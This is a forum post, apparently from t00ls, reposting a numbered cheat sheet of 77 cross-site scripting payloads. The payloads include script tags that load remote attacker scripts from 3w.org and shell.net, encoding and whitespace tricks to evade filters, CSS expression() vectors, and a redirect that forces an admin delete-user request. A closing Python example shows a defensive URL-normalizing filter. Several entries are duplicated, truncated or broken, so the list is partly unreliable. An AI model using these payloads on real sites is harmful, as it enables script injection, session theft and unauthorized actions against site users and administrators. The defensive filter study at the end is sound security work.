There seems to be little XSS material on t00ls, so I copied over something good I came across; not sure whether any of you want to bookmark it.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav...omitted...S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav...omitted...S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java...omitted...XSS')>
(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters have basically no effect domestically, since there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extra open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash, you can mix in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can embed JS code inside an image instead
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT ="">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP as decimal
<A HREF="http://3232235521">XSS</A>

(71) IP as hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP as octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
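The vectors in items 3 to 19 and 40 all work the same way: the URL in an attribute is read one way by a substring filter and another way by the browser, which decodes entities and drops tabs, newlines, leading spaces and (in the old IE case of item 17) null bytes before it looks at the scheme. As an added example, not part of the original post, the Python below contrasts a naive substring filter with a check that normalizes the value first and then inspects its scheme; the function names, the scheme list and the sample values are this example's own, constructed from the list above.

```python
import html
import re

# Schemes that turn a URL-valued attribute (SRC, HREF, BACKGROUND, url())
# into script execution in legacy browsers. Constructed for this example.
SCRIPT_SCHEMES = {"javascript", "vbscript", "livescript"}

# Tab, LF and CR are removed from a URL wherever they appear; leading
# C0 controls and spaces are trimmed before the scheme is parsed.
_STRIP_INSIDE = re.compile(r"[\t\n\r]")
_STRIP_LEADING = re.compile(r"^[\x00-\x20]+")


def naive_blocks(value: str) -> bool:
    """The kind of filter the cheat sheet defeats: a plain substring match."""
    return "javascript:" in value.lower()


def normalize_url(value: str) -> str:
    """Approximate what the browser sees after reading the attribute."""
    decoded = html.unescape(value)            # &#106;ava..., with or without ';'
    decoded = decoded.replace("\x00", "")     # item 17: java\0script (legacy IE)
    decoded = _STRIP_INSIDE.sub("", decoded)  # items 11-14: jav<TAB>ascript
    return _STRIP_LEADING.sub("", decoded)    # item 19: leading spaces/controls


def url_scheme(value: str) -> str:
    """Scheme of the normalized URL, lowercased; '' for relative URLs."""
    m = re.match(r"([A-Za-z][A-Za-z0-9+.-]*):", normalize_url(value))
    return m.group(1).lower() if m else ""


def is_script_url(value: str) -> bool:
    """True when the browser would treat the attribute value as script."""
    return url_scheme(value) in SCRIPT_SCHEMES


# Constructed samples mirroring items 3, 4, 11, 17, 19, 40 and an
# entity-encoded variant of item 5; the last two are benign controls.
SAMPLES = [
    "javascript:alert('XSS')",
    "JaVaScRiPt:alert('XSS')",
    "jav\tascript:alert('XSS');",
    "java\x00script:alert(\"XSS\")",
    "  javascript:alert('XSS');",
    'vbscript:msgbox("XSS")',
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "https://example.com/xss.js",
    "/images/a.png",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"naive={naive_blocks(s)!s:5} normalized={is_script_url(s)!s:5} {s!r}")
```

The point of the output is the rows where the naive column is False and the normalized column is True: those are exactly the tab, null and entity variants, and the fix is to normalize before checking, or better, to allow only http(s) and relative URLs.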